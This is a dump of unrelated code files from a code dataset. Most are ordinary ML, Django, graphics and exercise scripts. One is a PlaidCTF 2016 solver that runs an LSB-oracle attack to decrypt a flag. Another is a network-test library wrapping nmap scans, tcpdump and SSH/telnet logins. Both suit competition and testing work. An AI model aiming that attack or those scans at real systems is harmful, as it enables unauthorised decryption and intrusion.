idxs_test), batch_size=int(len(idxs_test)/10), shuffle=True)\n return train, val, test\n\n def update_weights(self, net):\n net.train()\n # train and update\n optimizer = torch.optim.SGD(net.parameters(), lr=self.args.lr, momentum=0.5)\n\n epoch_loss = []\n for iter in range(self.args.local_ep):\n batch_loss = []\n for batch_idx, (images, labels) 
in enumerate(self.ldr_train):\n images, labels = images.to(self.args.device), labels.to(self.args.device)\n net.zero_grad()\n log_probs = net(images)\n loss = self.loss_func(log_probs, labels)\n loss.backward()\n optimizer.step()\n # if self.args.gpu != -1:\n # loss = loss.cpu()\n if self.args.verbose and batch_idx % 10 == 0:\n print('Update Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n iter, batch_idx * len(images), len(self.ldr_train.dataset),\n 100. * batch_idx / len(self.ldr_train), loss.item()))\n self.tb.add_scalar('loss', loss.item())\n batch_loss.append(loss.item())\n epoch_loss.append(sum(batch_loss)/len(batch_loss))\n return net.state_dict(), sum(epoch_loss) / len(epoch_loss)\n\n def test(self, net):\n # optimizer = torch.optim.SGD(net.parameters(), lr=self.args.lr, weight_decay=2)\n # for iter in range(self.args.local_ep):\n # for batch_idx, (images, labels) in enumerate(self.ldr_train):\n # if self.args.gpu != -1:\n # images, labels = images.cuda(), labels.cuda()\n # images, labels = autograd.Variable(images), autograd.Variable(labels)\n # net.zero_grad()\n # log_probs = net(images)\n # loss = self.loss_func(log_probs, labels)\n # loss.backward()\n # optimizer.step()\n\n for batch_idx, (images, labels) in enumerate(self.ldr_test):\n images, labels = images.to(self.args.device), labels.to(self.args.device)\n log_probs = net(images)\n loss = self.loss_func(log_probs, labels)\n # if self.args.gpu != -1:\n # loss = loss.cpu()\n # log_probs = log_probs.cpu()\n # labels = labels.cpu()\n y_pred = torch.argmax(log_probs.data, dim=1)\n acc = metrics.accuracy_score(y_true=labels.data, y_pred=y_pred)\n return acc, loss.item()\n","sub_path":"models/Update.py","file_name":"Update.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"579659335","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0004_auto_20160314_0922'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contact',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=30)),\n ('email', models.EmailField(max_length=30, verbose_name=b'Email')),\n ('phone', models.CharField(max_length=10)),\n ('message', models.TextField()),\n ],\n ),\n migrations.AlterField(\n model_name='carbooking',\n name='date',\n field=models.DateField(default=b'2016-03-16'),\n ),\n ]\n","sub_path":"src/home/migrations/0005_auto_20160316_1219.py","file_name":"0005_auto_20160316_1219.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"409174048","text":"import os\nimport sys\nimport re\nimport pathlib\nfrom .OperatorHeader import OperatorHeader\nfrom .OperatorTypeResolver import OperatorTypeResolver\nfrom .OperatorSanityCheck import OperatorSanityCheck\nfrom .OperatorSets import OperatorSets\nfrom .OnnxWrapper import OnnxSchema\nfrom . 
import args\n\ndef note(text, verbosity=0 ):\n if verbosity <= args.verbose:\n print(text)\n\ndef warning(text, verbosity=0):\n if verbosity <= args.verbose:\n print(text, file=sys.stderr)\n\ndef fatal(text, error=1):\n print(text, file=sys.stderr)\n sys.exit(error)\n\nif args.onnx:\n sys.path.insert(0, os.path.realpath(args.onnx[0]))\n try:\n import onnx_cpp2py_export\n except:\n fatal(\"could not import onnx_cpp2py_export!\")\nelse:\n try:\n from onnx import onnx_cpp2py_export\n except:\n fatal(\"could not import onnx_cpp2py_export from onnx!\")\n\nnote(f\"onnx: {args.onnx}\",3)\nnote(f\"verbose: {args.verbose}\",3)\nnote(f\"header: {args.header}\",3)\nnote(f\"no_header: {args.no_header}\",3)\nnote(f\"check: {args.check}\",3)\nnote(f\"no_check: {args.no_check}\",3)\nnote(f\"resolve: {args.resolve}\",3)\nnote(f\"no_resolve: {args.no_resolve}\",3)\nnote(f\"sets: {args.sets}\",3)\nnote(f\"no_sets: {args.no_sets}\",3)\nnote(f\"force: {args.force}\",3)\nnote(f\"include: {args.include}\",3)\nnote(f\"exclude: {args.exclude}\",3)\nnote(f\"version: {args.version}\",3)\nnote(f\"domains: {args.domains}\",3)\nnote(f\"path: {args.path}\",3)\n\nall_schemas = [ OnnxSchema(s) for s in onnx_cpp2py_export.defs.get_all_schemas_with_history()]\nnum_schemas = len(all_schemas)\n\ndomain2name2version2schema = {}\nfor schema in all_schemas:\n name2version2schema = domain2name2version2schema.setdefault(schema.domain,{})\n version2schema = name2version2schema.setdefault(schema.name,{})\n version2schema[schema.version] = schema\n\nnote(\"selecting domains\")\ndomains = domain2name2version2schema.keys()\nnote(f\"onnx operator schemas have {len(domains)} domains: {', '.join(domains)}\",2)\nif \"all\" in args.domains:\n domains = domains\nelse:\n domains = set(args.domains)\n\ndelete_domains = []\nfor domain in domain2name2version2schema.keys():\n if domain in domains:\n note(f\"including domain '{domain}'\",2)\n else:\n note(f\"excluding domain '{domain}'\",3)\n delete_domains.append(domain)\nfor domain in delete_domains:\n del domain2name2version2schema[domain]\n\nnote(\"including onnx operator schemas\",1)\ndelete_names = {}\nfor domain, name2version2schema in domain2name2version2schema.items():\n for name in name2version2schema.keys():\n included = False\n for pattern in set(args.include):\n if re.match(pattern,name):\n note(f\"included '{domain}' operator schema '{name}' by pattern '{pattern}'\",2)\n included = True\n break\n if not included:\n note(f\"no pattern included '{domain}' operator schema {name}\",3)\n delete_names.setdefault(domain,[]).append(name)\nfor domain, names in delete_names.items():\n for name in names:\n del domain2name2version2schema[domain][name]\n\nnote(\"excluding onnx operator schemas\",1)\ndelete_names = {}\nfor domain, name2version2schema in domain2name2version2schema.items():\n for name in name2version2schema.keys():\n excluded = False\n for pattern in args.exclude:\n if re.match(pattern,name):\n note(f\"excluded '{domain}' operator schema '{name}' by pattern '{pattern}'\",2)\n excluded = True\n delete_names.setdefault(domain,[]).append(name)\n break\n if not excluded:\n note(f\"no pattern excluded '{domain}' operator schema {name}\",3)\nfor domain, names in delete_names.items():\n for name in names:\n del domain2name2version2schema[domain][name]\n\nnote(\"selecting onnx operator schema versions\")\ndelete_versions = {}\nfor domain, name2version2schema in domain2name2version2schema.items():\n for name, version2schema in name2version2schema.items():\n versions = 
version2schema.keys()\n note(f\"'{domain}' operator schema '{name}' has {len(versions)} version(s): {', '.join([str(v) for v in versions])}\",2)\n if args.version[-1] == \"all\":\n versions = versions\n elif args.version[-1] == \"latest\":\n versions = [max(versions)]\n else:\n for version in range(int(args.version[-1]),0,-1):\n if version in versions:\n versions = [version]\n break\n for version in version2schema.keys():\n if version in versions:\n note(f\"included '{domain}' operator schema '{name}' version {version}\",2)\n else:\n note(f\"excluded '{domain}' operator schema '{name}' version {version}\",3)\n delete_versions.setdefault(domain,{}).setdefault(name,[]).append(version)\nfor domain, name2version in delete_versions.items():\n for name, versions in name2version.items():\n for version in versions:\n del domain2name2version2schema[domain][name][version]\n\n\nschemas = []\nfor name2version2schema in domain2name2version2schema.values():\n for version2schema in name2version2schema.values():\n for schema in version2schema.values():\n schemas.append(schema)\n\nnote(\"generating onnx operator headers\")\npath = f\"{args.path[-1]}/{args.header[-1]}/\"\nheaders = [ OperatorHeader(s,path) for s in schemas ]\nnote(\"generating onnx operator type resolvers\")\npath = f\"{args.path[-1]}/{args.resolve[-1]}/\"\nresolvers = [ OperatorTypeResolver(s,path) for s in schemas ]\nnote(\"generating onnx operator sanity checks\")\npath = f\"{args.path[-1]}/{args.check[-1]}/\"\nchecks = [ OperatorSanityCheck(s,path) for s in schemas ]\nnote(\"generating onnx operator sets\")\npath = f\"{args.path[-1]}/{args.sets[-1]}/\"\nsets = OperatorSets(headers,path)\n\nfiles = []\nif not args.no_header:\n for h in headers:\n files.append(h)\nif not args.no_resolve:\n for r in resolvers:\n files.append(r)\nif not args.no_check:\n for c in checks:\n files.append(c)\nif not args.no_sets:\n files.append(sets)\n\nwritecount = 0\nnote(\"Writing files\",1)\nif not args.path[-1]:\n warning(\"skipping write because args.path is not set\")\nelse:\n for obj in files:\n path = obj.filename().resolve()\n if path.exists() and not args.force:\n warning(f\"skipping existing file '{path}'\",1)\n continue\n note(f\"writing file {path}\",3)\n os.makedirs(path.parent,exist_ok=True)\n path.open(\"w\").write(obj.text())\n writecount += 1\nnote(f\"wrote {writecount} of {len(files)} files\")\n","sub_path":"scripts/onnx_generator/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"467834439","text":"import math\nimport operator\nimport string\nimport tpg\nimport sys\n\ndef make_op(op):\n\treturn {\n\t\t\t'+': lambda x,y: x+y,\n\t\t\t'-': lambda x,y: x-y,\n\t\t\t'*': lambda x,y: x*y,\n\t\t\t'/': lambda x,y: x/y,\t\t\n\t\t\t'xor': operator.xor,\n\t\t}[op]\nclass TheLanguage(tpg.Parser):\n\tr\"\"\"\n\t\tseparator space\t'\\s+' ;\n\t\ttoken number: '\\d+' int;\n\t\ttoken add\t'[+-]'\tmake_op ;\n\t\ttoken mul\t'[*/%]' make_op ;\n\t\ttoken xor_op\t'xor' make_op;\n\t\tSTART/e -> Term/e ;\n\t\tTerm/t -> Fact/t ( add/op Fact/f $t=op(t,f)$ )* ;\n\t\tFact/f -> Atom/f ( mul/op Atom/a $f=op(f,a)$ )* ;\n\t\tAtom/a -> number/a | '\\(' Term/a '\\)' ;\n\t\"\"\"\n\t\t\nif tpg.__python__ == 3:\n\toperator.div = operator.truediv\n\traw_input = input\n\ndef main(argv):\n print (\"HW4 (TPG Parser for 'The Language')\")\n lang = TheLanguage()\n fileName = argv[1]\n export = \"\"\n outputFileName = \"output.txt\"\n f = open(fileName,\"r\")\n 
for line in f:\n try:\n export += str(lang(line)) + \"\\n\"\n except Exception:\n errorText = str(tpg.exc())\n if \"SyntacticError\" in errorText:\n export += \"SYNTAX ERROR\"+\"\\n\"\n if \"LexicalError\" in errorText:\n export += \"SEMANTIC ERROR\"+\"\\n\"\n f.close()\n f = open(outputFileName, \"w\")\n f.write(export)\n f.close()\nmain(sys.argv)\n\n#Test Input\n#1 - 2 +3 WORKS\n#1 2 3 need to add syntax error catch\n#42 + \"Green\" Semantic error catch\n#1-(2+3) WORKS\n#\"Hello\"+\"\"+\"World.\"\n#[1.2,3][1] + 40 (Add Array support)\n#3 xor 5\n\n","sub_path":"Python/hw4/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"19608699","text":"# coding=utf-8\n# frame_buffer.py\n# created on 2020/12/26\n# author @zoloypzuo\n# usage: frame_buffer\nfrom OpenGL import GL as gl\n\n\nclass FrameBuffer(object):\n def __init__(self, width=0, height=0, samples=1, swap_chain_target=False):\n self.handle = 0\n self.color_attachment_handle = 0\n self.depth_attachment_handle = 0\n self.width = width\n self.height = height\n self.samples = samples\n self.swap_chain_targets = swap_chain_target\n self.initialize()\n\n def initialize(self):\n if self.handle:\n self.finalize()\n self.handle = gl.glGenFramebuffers(1)\n\n self.color_attachment_handle = color_attachment_handle = gl.glCreateTextures(gl.GL_TEXTURE_2D, 1)\n gl.glBindTexture(gl.GL_TEXTURE_2D, color_attachment_handle)\n gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl.GL_RGBA8, self.width, self.height, 0, gl.GL_RGBA,\n gl.GL_UNSIGNED_BYTE, None)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_LINEAR)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_LINEAR)\n\n gl.glFramebufferTexture2D(gl.GL_FRAMEBUFFER, gl.GL_COLOR_ATTACHMENT0, gl.GL_TEXTURE_2D,\n color_attachment_handle, 0)\n\n self.depth_attachment_handle = depth_attachment_handle = gl.glCreateTextures(gl.GL_TEXTURE_2D, 1)\n gl.glBindTexture(gl.GL_TEXTURE_2D, depth_attachment_handle)\n gl.glTexStorage2D(gl.GL_TEXTURE_2D, 1, gl.GL_DEPTH24_STENCIL8, self.width, self.height)\n gl.glFramebufferTexture2D(gl.GL_FRAMEBUFFER, gl.GL_DEPTH_STENCIL_ATTACHMENT, gl.GL_TEXTURE_2D,\n depth_attachment_handle, 0)\n\n gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0)\n\n def finalize(self):\n gl.glDeleteFramebuffers(1, self.handle)\n gl.glDeleteTextures(1, self.color_attachment_handle)\n gl.glDeleteTextures(1, self.depth_attachment_handle)\n\n def bind(self):\n gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, self.handle)\n gl.glViewport(gl.GL_FRAMEBUFFER, 0)\n\n def unbind(self):\n gl.glBindFramebuffer(gl.GL_FRAMEBUFFER, 0)\n\n def resize(self, width, height):\n if width <= 0 or height <= 0 or width > 8192 or height > 8192:\n return\n self.width = width\n self.height = height\n self.initialize()\n","sub_path":"Prototype/framework/renderer/frame_buffer.py","file_name":"frame_buffer.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"91882291","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 9 13:21:23 2021\n\n@author: Poulami\n\"\"\"\n\nimport urllib.request, urllib.error\n#import bs4\n#import plyer\nfrom bs4 import BeautifulSoup\nimport datetime\nfrom plyer import notification\nimport time\n\n\ndef WordOfTheDay(f):\n content=f.read()\n soup = BeautifulSoup(content,'lxml')\n word_html=soup.findAll(\"div\",{'class':\"word-and-pronunciation\"})\n 
defination_html=soup.findAll(\"div\",{'class':\"wod-definition-container\"})\n for x in word_html:\n word=(x.find('h1').text)\n break\n definition=[]\n for x in defination_html:\n for col in x.find_all('p'):\n if ':' in col.text[0:6]:\n definition.append(col.text)\n definition_val=\"\\n\".join(definition)\n while (True):\n notification.notify(\n #title of the notification,\n title = \"Word Of The Day For {}: {}\".format(datetime.date.today().strftime(\"%d, %b %Y\"),word.upper()),\n #the body of the notification\n message = \"Definition: {defi}\".format(defi=definition_val), \n #creating icon for the notification\n #we need to download a icon of ico file format\n app_icon = \"Bell.ico\",\n # the notification stays for 50sec\n timeout = 60\n )\n #sleep for 4 hrs => 60*60*4 sec\n #notification repeats after every 4hrs\n time.sleep(60*60*4)\n\nif __name__==\"__main__\":\n url = 'https://www.merriam-webster.com/word-of-the-day'\n try:\n conn = urllib.request.urlopen(url)\n except urllib.error.HTTPError as e:\n # Return code error (e.g. 404, 501, ...)\n # ...\n print('HTTPError: {}'.format(e.code))\n except urllib.error.URLError as e:\n # Not an HTTP-specific error (e.g. connection refused)\n # ...\n print('URLError: {}'.format(e.reason))\n else:\n # 200\n # ...\n WordOfTheDay(conn)","sub_path":"DesktopNotification.py","file_name":"DesktopNotification.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"616826758","text":"# -*- coding: utf-8 -*cos-\r\n\"\"\"\r\nCreated on Sun Sep 23 23:38:03 2018\r\n\r\n@author: Invisible-Tilkey\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nimport input_data\r\n#from tensorflow.examples.tutorials.mnist import input_data\r\n\r\nmnist = input_data.read_data_sets('data/', one_hot=True)\r\ntrainimg = mnist.train.images\r\ntrainlabel = mnist.train.labels\r\ntestimg = mnist.test.images\r\ntestlabel = mnist.test.labels\r\nprint (\"MNIST loaded\")\r\n\r\n# network topologies\r\n# input是像素点个数,classes是最后分类类别(10分类:0~9),hidden 每层神经元\r\nprint (\"What does the data of MNIST look like?\")\r\nn_input = 784\r\nn_output = 10\r\n\r\n# network parameters\r\n# w和b变量初始化\r\nstddev = 0.1\r\nweights = {\r\n # 卷积层权重\r\n 'wc1': tf.Variable(tf.random_normal([3, 3, 1, 64], stddev=stddev)),\r\n 'wc2': tf.Variable(tf.random_normal([3, 3, 64, 128], stddev=stddev)),\r\n # 全链接层权重,其中1024是我们定义的输出向量维数\r\n 'wd1': tf.Variable(tf.random_normal([7*7*128, 1024], stddev=stddev)),\r\n 'wd2': tf.Variable(tf.random_normal([1024, n_output], stddev=stddev)),\r\n} \r\n \r\n# 对w参数一般我们使用高斯初始化\r\nbiases = {\r\n 'bc1': tf.Variable(tf.random_normal([64], stddev=stddev)),\r\n 'bc2': tf.Variable(tf.random_normal([128], stddev=stddev)),\r\n 'bd1': tf.Variable(tf.random_normal([1024], stddev=stddev)),\r\n 'bd2': tf.Variable(tf.random_normal([n_output], stddev=stddev)),\r\n}\r\nprint (\"Network Ready\")\r\n# 对b参数用高斯和零值初始化都行\r\n\r\ndef conv_basic(_input, _w, _b, _keepratio):\r\n \r\n # INPUT 对输入做预处理,把输入格式转化(Reshape)为4维的,适应Tensorflow\r\n # 单张图片处理的情况下,令batch size = 1\r\n # dim1 = batch size = n // -1表示让Tensorflow自己推算,dim1是可以被自己推算的(另外三维确认情况下)\r\n # dim2 = height\r\n # dim3 = width\r\n # dim4 = channel\r\n _input_r = tf.reshape(_input, shape=[-1, 28, 28, 1])\r\n\r\n# =============================================================================\r\n# # CONV Layer1\r\n# =============================================================================\r\n # conv2d: 第一个输入是 
reshape后输入\r\n # conv2d: 第二个输入是 权重参数wc1\r\n # conv2d: 第三个输入是 定义为四维格式,分别对应四个维度的stride/进步大小。一般只更改 h 和 w 的strides其他不变\r\n # conv2d: 第四个输入是 Padding 'SAME' of 'VALID' 卷积滑动窗口, \r\n # SAME 123 234 345 450 500 0填充 || 建议选择\r\n # VALID 123 234 345 不填充\r\n _conv1 = tf.nn.conv2d(_input_r, _w['wc1'], strides=[1, 1, 1, 1], padding='SAME')\r\n \r\n # 卷积完后,进行非线性激活函数 也就是ReLU\r\n _conv1 = tf.nn.relu(tf.nn.bias_add(_conv1, _b['bc1']))\r\n _pool1 = tf.nn.max_pool(_conv1, ksize = [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n # 可以随机杀死一些结点,不参与到总链接, Keepratio是保留参数比如 0.6\r\n _keepratio = 0.6\r\n _pool_dr1 = tf.nn.dropout(_pool1, _keepratio)\r\n\r\n\r\n# =============================================================================\r\n# # CONV Layer2\r\n# =============================================================================\r\n _conv2 = tf.nn.conv2d(_pool_dr1, _w['wc2'], strides=[1, 1, 1, 1], padding='SAME')\r\n _conv2 = tf.nn.relu(tf.nn.bias_add(_conv2, _b['bc2']))\r\n _pool2 = tf.nn.max_pool(_conv2, ksize = [1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\r\n _pool_dr2 = tf.nn.dropout(_pool2, _keepratio)\r\n\r\n # VECTORIZE 转换为向量\r\n # 获取wd1这个向量的形状7*7*128,再将其转换为list得到全链接层需要的向量大小\r\n _dense1 = tf.reshape(_pool_dr2, [-1, _w['wd1'].get_shape().as_list()[0]])\r\n # Fully connected layer 1 全链接层1\r\n _fc1 = tf.nn.relu(tf.add(tf.matmul(_dense1, _w['wd1']), _b['bd1']))\r\n _fc_dr1 = tf.nn.dropout(_fc1, _keepratio)\r\n # Fully connected layer 2 全链接层2\r\n _fc2 = tf.add(tf.matmul(_fc_dr1, _w['wd2']), _b['bd2'])\r\n \r\n # RETUEN\r\n out = { 'input_r': _input_r, 'conv1': _conv1, 'pool1': _pool1, 'pool_dr1': _pool_dr1,\r\n 'conv2': _conv2, 'pool2': _pool2, 'pool_dr2': _pool_dr2, 'dense1': _dense1,\r\n 'fc1': _fc1, 'fc_dr1': _fc_dr1, 'fc2': _fc2 \r\n }\r\n return out\r\nprint (\"CNN READY\")\r\n \r\n \r\n\r\n\r\n# =============================================================================\r\n# 迭代开始!!!!!!\r\n# =============================================================================\r\n\r\n#a = tf.Variable(tf.random_normal([3, 3, 1, 64], stddev=stddev))\r\n#print (a)\r\n#a = tf.Print(a, [a], \"a: \")\r\n\r\n# 先占用xy的位置,再一个个batch地往里面进行填充\r\nx = tf.placeholder(tf.float32, [None, n_input]) #None样本个数不确定, n_input=784\r\ny = tf.placeholder(tf.float32, [None, n_output]) #None样本个数不确定, n_class=10\r\nkeepratio = tf.placeholder(tf.float32)\r\n\r\n\r\n# 反向传播 Fonctions\r\n_pred = conv_basic(x, weights, biases, keepratio)['fc2']\r\n\r\n# Loss & Optimizer\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = _pred, labels = y)) #交叉熵函数\r\noptm = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)\r\n_corr = tf.equal(tf.argmax(_pred, 1), tf.argmax(y, 1))\r\naccr = tf.reduce_mean(tf.cast(_corr, tf.float32))\r\ninit = tf.global_variables_initializer()\r\nprint (\"FONCTIONS READY\")\r\n\r\n# Train Parameter\r\ntraining_epochs = 15\r\n# batch size 较小,因为运算量太大\r\nbatch_size = 16\r\ndisplay_step = 1\r\n \r\nsess = tf.Session()\r\nsess.run(init)\r\n \r\n# OPTIMIZE\r\nfor epoch in range(training_epochs):\r\n avg_cost = 0.\r\n# total_batch = int(mnist.train.num_examples/batch_size) # batch次数=总数/batchsize\r\n total_batch = 10 # 运算量太大,不用全部算完\r\n #Iteration\r\n for i in range(total_batch):\r\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\r\n feeds = {x: batch_xs, y: batch_ys, keepratio: 0.7} # batch填充值\r\n sess.run(optm, feed_dict=feeds) \r\n avg_cost += sess.run(cost, feed_dict=feeds)\r\n \r\n if epoch % display_step == 0:\r\n print (\"Epoch: %03d/%03d cost:%.9f\" % (epoch, training_epochs, 
avg_cost))\r\n train_acc = sess.run(accr, feed_dict={x: batch_xs, y: batch_ys})\r\n print (\"TRAIN ACCURACY: %.3f\" % (train_acc))\r\n# test_acc = sess.run(accr, feed_dict=feeds)\r\n# print (\"TEST ACCURACY: %.3f\" % (test_acc))\r\nprint (\"OPTIMIZATION FINISHED\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","sub_path":"some_my_not_yet_ordered_practicing/C N Network.py","file_name":"C N Network.py","file_ext":"py","file_size_in_byte":6807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"406638476","text":"\nfrom termcolor import colored\n\n\nprint(colored(\"\"\"\n++++++++++++++++++++++++++++++++++++\n+ + \n+ Task from the book +\n+ \"Pytnon Crash course\" +\n+ +\n+ Section #6 +\n+ Task#6-5 +\n+ Task name rivers +\n+ + \n+ +\n++++++++++++++++++++++++++++++++++++ \n\"\"\", 'yellow'))\n\n#6-5. Реки: создайте словарь с тремя большими реками и странами, по которым протекает\n#каждая река. Одна из возможных пар «ключ—значение» — ‘nile’: ‘egypt’.\n#• Используйте цикл для вывода сообщения с упоминанием реки и страны — например,\n#«The Nile runs through Egypt.»\n#• Используйте цикл для вывода названия каждой реки, включенной в словарь.\n#• Используйте цикл для вывода названия каждой страны, включенной в словарь.\n# Ну и от себя добавлю красоты цветом\nrivers = {\n'egypt' : 'neal',\n'russia' : 'volga',\n'usa' : 'gudzon'\n }\n\nfor name, river in rivers.items(): # НАПОМИНАНИЕ если ходим ВСЕ данные то используем \"items()\"\n print(\"The \" + colored(river, 'green') +\" runs through \" + colored(name, 'yellow'))\n\n\nprint (colored(\"+++++++++++++++\", 'red'))\nfor name in rivers.keys():\n print(name)\nprint (colored(\"+++++++++++++++\", 'red'))\nprint (colored(\"+++++++++++++++\", 'blue'))\nfor river in rivers.values():\n print(river)\nprint (colored(\"+++++++++++++++\", 'blue'))\n\n\n\n\nprint(\"EOF PAK\")\ninput()\n\n\n","sub_path":"rivers6-5.py","file_name":"rivers6-5.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"366477075","text":"#!/usr/bin/env python\n\nfrom sys import stdin, stdout, stderr\nfrom itertools import product\nfrom re import search\nfrom string import digits, letters\nfrom hashlib import sha1\n\ndef proof_of_work():\n # Before we begin, a quick proof of work:\\n\n stderr.write(stdin.readline())\n # Give me a string starting with {}, of length {}, such that its sha1 sum ends in ffffff\\n\n line = stdin.readline()\n stderr.write(line)\n stderr.flush()\n m = search(r'with (\\w+), of length (\\d+)', line)\n assert m is not None\n prefix = m.group(1)\n length = long(m.group(2))\n for t in product(digits + letters, repeat=length-len(prefix)):\n s = prefix + \"\".join(t)\n if sha1(s).digest()[-3:] == \"\\xff\"*3:\n stderr.write(\"{}\\n\".format(s))\n stderr.flush()\n stdout.write(s)\n stdout.flush()\n return\n\ndef guess():\n # Welcome to the LSB oracle! 
N = {}\\n\n line = stdin.readline()\n stderr.write(line)\n m = search(r'N = (\\d+)', line)\n assert m is not None\n N = long(m.group(1))\n # Encrypted Flag: {}\\n\n line = stdin.readline()\n stderr.write(line)\n stderr.flush()\n m = search(r'Encrypted Flag: (\\d+)', line)\n assert m is not None\n enc_flag = long(m.group(1))\n # Give a ciphertext:\n lower = 0\n upper = N\n c = enc_flag\n i = 0\n while lower < upper:\n c = (4 * c) % N\n stdout.write(\"{}\\n\".format(c))\n stdout.flush()\n # lsb is {}\\n\n m = search(r'lsb is (\\d+)', stdin.readline())\n assert m is not None\n lsb = int(m.group(1))\n if lsb == 1:\n lower = (lower + upper) // 2\n else:\n upper = (lower + upper) // 2\n stderr.write(\"#{} lsb={} remaining={} {}<=x<{}\\n\".\n format(i, lsb, (upper-lower).bit_length(), lower, upper))\n stderr.flush()\n i += 1\n stderr.write(\"flag is {}\\n\".format(format(upper, 'x').decode('hex')))\n stderr.flush()\n\nproof_of_work()\nguess()\n","sub_path":"2016/plaidctf-2016/rabit-175/rabit.py","file_name":"rabit.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"83376791","text":"# Copyright (c) 2015\n#\n# All rights reserved.\n#\n# This file is distributed under the Clear BSD license.\n# The full text can be found in LICENSE in the root directory.\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n\nimport re\n\ndef tcpdump_capture(device, interface, port=None, capture_file='pkt_capture.pcap'):\n if port == None:\n device.sudo_sendline(\"tcpdump -i %s -n -w %s &\" %(interface, capture_file))\n else:\n device.sudo_sendline(\"tcpdump -i %s -n \\'portrange %s\\' -w %s &\" %(interface, port, capture_file))\n device.expect(device.prompt)\n return device.before\n\ndef kill_process(device, process=\"tcpdump\"):\n device.sudo_sendline(\"killall %s\" %process)\n device.expect(device.prompt)\n device.sudo_sendline(\"sync\")\n device.expect(device.prompt)\n return device.before\n\ndef tcpdump_read(device, capture_file):\n device.sudo_sendline(\"tcpdump -n -r %s\" %(capture_file))\n device.expect(device.prompt)\n output = device.before\n device.sudo_sendline(\"rm %s\" %(capture_file))\n device.expect(device.prompt)\n return output\n\ndef nmap_cli(device, ip_address, port, protocol=None, retry=\"0\"):\n if protocol == \"tcp\":\n device.sudo_sendline(\"nmap -sS %s -p %s -Pn -r -max-retries %s\" %(ip_address,port,retry))\n elif protocol == \"udp\":\n device.sudo_sendline(\"nmap -sU %s -p %s -Pn -r -max-retries %s\" %(ip_address,port,retry))\n else:\n device.sudo_sendline(\"nmap -sS -sU %s -p %s -Pn -r -max-retries %s\" %(ip_address,port,retry))\n device.expect(device.prompt,timeout=200)\n return device.before\n\ndef ssh_service_verify(device, dest_device, ip, opts=\"\", ssh_key=\"-oKexAlgorithms=+diffie-hellman-group1-sha1\"):\n \"\"\"\n This function assumes that the server does not know the identity of the client!!!!!\n I.e. 
no passwordless login\n \"\"\"\n device.sendline(\"ssh %s@%s\" %(dest_device.username, ip))\n try:\n idx = device.expect(['no matching key exchange method found']+ ['(yes/no)']+ ['assword:'], timeout=60)\n if idx == 0:\n device.expect(device.prompt)\n device.sendline(\"ssh %s %s@%s %s\" %(ssh_key, dest_device.username, ip, opts))\n idx = device.expect(['(yes/no)'] + ['assword:'], timeout=60)\n if idx == 0:\n idx = 1\n if idx == 1:\n device.sendline('yes')\n device.expect(\"assword:\")\n device.sendline(dest_device.password)\n device.expect(dest_device.prompt)\n device.sendline(\"exit\")\n device.expect(device.prompt, timeout=20)\n except Exception as e:\n print(e)\n raise Exception(\"Failed to connect SSH to :%s\" %device.before)\n\ndef telnet_service_verify(device, dest_device, ip, opts=\"\"):\n device.sendline(\"telnet%s %s\" %(opts, ip))\n try:\n device.expect([\"Username:\"], timeout=60)\n device.sendline(dest_device.username)\n device.expect([\"assword:\"])\n device.sendline(dest_device.password)\n device.expect(dest_device.prompt, timeout=40)\n device.sendline(\"exit\")\n device.expect(device.prompt, timeout=20)\n except Exception as e:\n print(e)\n raise Exception(\"Failed to connect telnet to :%s\" %device.before)\n","sub_path":"boardfarm/tests/lib/network_testing.py","file_name":"network_testing.py","file_ext":"py","file_size_in_byte":3207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"128051373","text":"\"\"\"\n53. Tokenization\nStanford Core NLPを用い,入力テキストの解析結果をXML形式で得よ.\nまた,このXMLファイルを読み込み,入力テキストを1行1単語の形式で出力せよ.\n\njava -cp \"/usr/local/lib/stanford-corenlp-full-2013-06-20/*\"\n -Xmx2g edu.stanford.nlp.pipeline.StanfordCoreNLP\n 